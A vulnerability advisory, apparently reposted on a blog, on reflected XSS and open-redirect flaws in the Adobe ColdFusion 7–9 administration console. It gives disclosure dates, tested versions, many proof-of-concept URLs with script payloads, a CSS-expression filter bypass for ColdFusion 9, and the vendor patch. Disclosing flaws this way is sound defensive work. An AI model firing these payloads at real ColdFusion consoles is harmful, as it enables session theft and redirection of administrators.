Mar 16, 2011

PR10-08 Various XSS and information disclosure flaws within Adobe ColdFusion administration console

  • Advisory publicly released: Monday, 14 March 2011
  • Vulnerability found: Saturday, 17 April 2010
  • Vendor informed: Monday, 19 April 2010
  • Vulnerability fixed: Tuesday, 8 February 2011
  • Severity level: Medium/High
  • Credits
    Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com)
  • Description
    Adobe ColdFusion is an easy to use and very widely adopted Programming language, Procheckup has discovered that the ColdFusion admin console (and various programs within), are vulnerable to reflective XSS attacks. The Admin console is normally accessed using a web browser over port 8500 (though this can be changed) or directly mapped onto a web server directory by proxying cfm extensions.

    Note: Tested on ColdFusion enterprise version 8.01 running on Windows XP, and ColdFusion 7,8,9 running on Windows 2003 R2 SP2 server and mapped to IIS 6.
    Defaults were chosen with "server contained installation", and all subcomponents.
    Versions tested
    ColdFusion MX7 7,0,0,91690 base patches
    ColdFusion MX8 8,0,1,195765 base patches
    ColdFusion MX8 8,0,1,195765 with Hotfix4
    ColdFusion MX8 8,0,1,195765 with Hotfix4 and patches from security Bulletin APSB10-11 shf8010001.jar and CFIDE-801.zip
    ColdFusion 9 9,0,0,251028 base patches - ColdFusion 9 includes a simple list of forbidden tags. So <script> cannot be used.
    ColdFusion 9 9,0,0,251028 with Hotfix1 – ColdFusion 9 includes a simple list of forbidden tags. So <script> cannot be used
  • Proof of concept
    The following demonstrate the XSS flaws:-

    1) Unauthenticated vanilla XSS - ColdFusion 7 and ColdFusion 8. IE7 browser used.
    http://target-domain.foo:8500/CFIDE/administrator/archives/index.cfm?browsesubmit=Browse+Server&mapping=&5921a"><script>alert(1)</script>3081b18fb95=1

    Does not work with ColdFusion 7
    http://target-domain.foo:8500/CFIDE/administrator/datasources/derbyEmbedded.cfm?dsn=cfartgallery&"><script>alert(1)</script>=1

    http://target-domain.foo:8500/CFIDE/administrator/extensions/corbaedit.cfm?"><script>alert(1)</script>

    http://target-domain.foo:8500/CFIDE/administrator/logviewer/searchlog.cfm?logfile="><script>alert(1)</script>

    http://target-domain.foo:8500/CFIDE/administrator/settings/fonts.cfm?fontPath=555-555-0199@example.com&browsesubmit=Browse+Server&mapping=&5921a"><script>alert(1)</script>3081b18fb95=1

    http://target-domain.foo:8500/CFIDE/administrator/settings/fonts.cfm?browsesubmit=Browse+Server&mapping=&5921a"><script>alert(1)</script>3081b18fb95=1

    http://target-domain.foo:8500/CFIDE/administrator/settings/jvm.cfm?browsesubmit=Browse+Server&jvmArgs=-server+-Dsun.io.useCanonCaches%3dfalse+-XX%3aMaxPermSize%3d192m+-XX%3a%2bUseParallelGC+-Dcoldfusion.rootDir%3d%7bapplication.home%7d%2f..%2f+-Dcoldfusion.libPath%3d%7bapplication.home%7d%2f..%2flib&jdkPath=C%3a%2fColdFusion8%2fruntime%2fjre&minHeap=0&maxHeap=512&12bf2"><script>alert(1)</script>1fb5988b6d1

    http://target-domain.foo:8500/CFIDE/administrator/settings/mappings.cfm?browsesubmit=Browse+Server&mapping=&5921a"><script>alert(1)</script>3081b18fb95=1

    http://target-domain.foo:8500/CFIDE/administrator/settings/version.cfm?browsesubmit=Browse+Server&mapping=&5921a"><script>alert(1)</script>3081b18fb95=1

    Works intermittently, or delayed response.
    http://target-domain.foo:8500/CFIDE/administrator/analyzer/index.cfm?browsesubmit=Browse+Server&directory=C%3a%5cColdFusion8%5cwwwroot%5cCFIDE%5cadministrator%5canalyzerd590f"style%3d"x:expression(alert(1))"

    COLDFUSION VERSION 9 – Variants which work with CF9 as do not use the <script> tag
    To circumvent this the <script>alert(1)</script> needs to be substituted with a tag not on the match list </XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")> (this works on IE7 & IE6)

    http://target-domain.foo/CFIDE/administrator/archives/index.cfm?browsesubmit=Browse+Server&mapping=&5921a"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>3081b18fb95=1

    http://target-domain.foo/CFIDE/administrator/datasources/derbyEmbedded.cfm?dsn=cfartgallery&"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>=1

    http://target-domain.foo/CFIDE/administrator/extensions/corbaedit.cfm?"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>

    http://target-domain.foo/CFIDE/administrator/logviewer/searchlog.cfm?logfile="></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>

    http://target-domain.foo/CFIDE/administrator/settings/fonts.cfm?fontPath=555-555-0199@example.com&browsesubmit=Browse+Server&mapping=&5921a"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>

    http://target-domain.foo/CFIDE/administrator/settings/fonts.cfm?browsesubmit=Browse+Server&mapping=&5921a"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>

    http://target-domain.foo/CFIDE/administrator/settings/jvm.cfm?browsesubmit=Browse+Server&jvmArgs=-server+-Dsun.io.useCanonCaches%3dfalse+-XX%3aMaxPermSize%3d192m+-XX%3a%2bUseParallelGC+-Dcoldfusion.rootDir%3d%7bapplication.home%7d%2f..%2f+-Dcoldfusion.libPath%3d%7bapplication.home%7d%2f..%2flib&jdkPath=C%3a%2fColdFusion8%2fruntime%2fjre&minHeap=0&maxHeap=512&12bf2"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>1

    http://target-domain.foo/CFIDE/administrator/settings/mappings.cfm?browsesubmit=Browse+Server&mapping=&5921a"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>3081b18fb95=1

    http://target-domain.foo/CFIDE/administrator/settings/version.cfm?browsesubmit=Browse+Server&mapping=&5921a"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>3081b18fb95=1

    3) Authenticated vanilla XSS attacks.
    IE7 +Firefox - authenticated
    http://target-domain.foo:8500/CFIDE/administrator/extensions/appletedit.cfm?method=1&code=1&width=1&applet=1"><script>alert(1)</script>5d59011273e

    IE7 - authenticated
    http://target-domain.foo:8500/CFIDE/administrator/extensions/cfx_cppedit.cfm?PROCEDURE=ProcessTagRequestbaccd%22style%3d%22x:expression%28alert%281%29%29%221dcd653666d&TAGNAME=cfx_&CACHE=on&TreeSubmitApply=true

    IE7 - authenticated – Does not work with ColdFusion 7
    http://target-domain.foo:8500/CFIDE/administrator/eventgateway/gatewaytypes.cfm?typename=ActiveMQca235"style%3d"x:expression(alert(1))"6de21ab4628&action=edit

    Takes a while to come back - authenticated
    http://target-domain.foo:8500/CFIDE/administrator/settings/clientvariables.cfm?action=edit&store=Registrydb5a1"style%3d"x:expression(alert(1))"8d51e21067f


    COLDFUSION VERSION 9 – Variants which work with CF9 as do not use the <script> tag
    To circumvent this the <script>alert(1)</script> needs to be substituted with a tag not on the match list </XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")> (this works on IE7 & IE6)

    http://target-domain.foo/CFIDE/administrator/extensions/appletedit.cfm?method=1&code=1&width=1&applet=1"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>5d59011273e

    http://target-domain.foo/CFIDE/administrator/extensions/cfx_cppedit.cfm?PROCEDURE=ProcessTagRequestbaccd%22style%3d%22x:expression%28alert%281%29%29%221dcd653666d&TAGNAME=cfx_&CACHE=on&TreeSubmitApply=true

    http://target-domain.foo/CFIDE/administrator/eventgateway/gatewaytypes.cfm?typename=ActiveMQca235"style%3d"x:expression(alert(1))"6de21ab4628&action=edit

    Takes a while to come back
    http://target-domain.foo/CFIDE/administrator/settings/clientvariables.cfm?action=edit&store=Registrydb5a1"style%3d"x:expression(alert(1))"8d51e21067f

    4) Authenticated vanilla XSS fixed in ColdFusion 8 hotfix 4 (works with ColdFusion 8 and ColdFusion 7).

    http://target-domain.foo:8500/CFIDE/administrator/datasources/index.cfm?locale=enb6f5d"style%3d"x:expression(alert(1))"24ac5d7bc65&VerifyAllDatasources=+Verify+All+Connections+
    http://target-domain.foo:8500/CFIDE/administrator/eventgateway/gateways.cfm?gwid=SMS%20Menu%20App%20%2D%20555121268668"style%3d"x:expression(alert(1))"886b9fc22e4&action=edit

    http://target-domain.foo:8500/CFIDE/administrator/j2eepackaging/editarchive.cfm?locale=en579a7"style%3d"x:expression(alert(1))"df5c8bdd5e9&addarchive=%a0+Add+%a0&archivename=Test+Me

    Takes a while to come back
    http://target-domain.foo:8500/CFIDE/administrator/settings/charting.cfm?browsesubmit=Browse+Server&CachePath=C%3a%5cJRun4%5cservers%5ccfusion%5ccfusion-ear%5ccfusion-war%5cWEB-INF%5ccfusion%5ccharting%5ccachef2250"style%3d"x:expression(alert(1))"7d1c33c9139&maxEngines=4&cacheSize=50&cacheType=1



    Consequences:

    An attacker may be able to cause execution of malicious scripting code in the browser of a user who clicks on a link to an exposed ColdFusion admin site. Such code would run within the

    security context of the target domain. This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: session IDs) to

    unauthorised third parties.



    Fix:
    Apply patch as described in Adobe bulletin apsb11-04
    http://www.adobe.com/support/security/bulletins/apsb11-04.html



    4) Open redirection - fixed hot fix 4
    http://target-domain.foo:8500/CFIDE/administrator/logging/archiveexecute.cfm?logfile=application%2Elog&return=true
    Set the referer header..
    Referer: http://www.procheckup.com

    References:
    http://www.procheckup.com/Vulnerabilities.php
    http://www.adobe.com/support/security/bulletins/apsb11-04.html
    http://www.securityfocus.com/bid/46273 
  • How to fix
    Apply patch as described in Adobe bulletin apsb11-04
    http://www.adobe.com/support/security/bulletins/apsb11-04.html  
 
Source: http://blog.kotowicz.net/2011/03/exploiting-unexploitable-xss-with.html

No comments:

 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |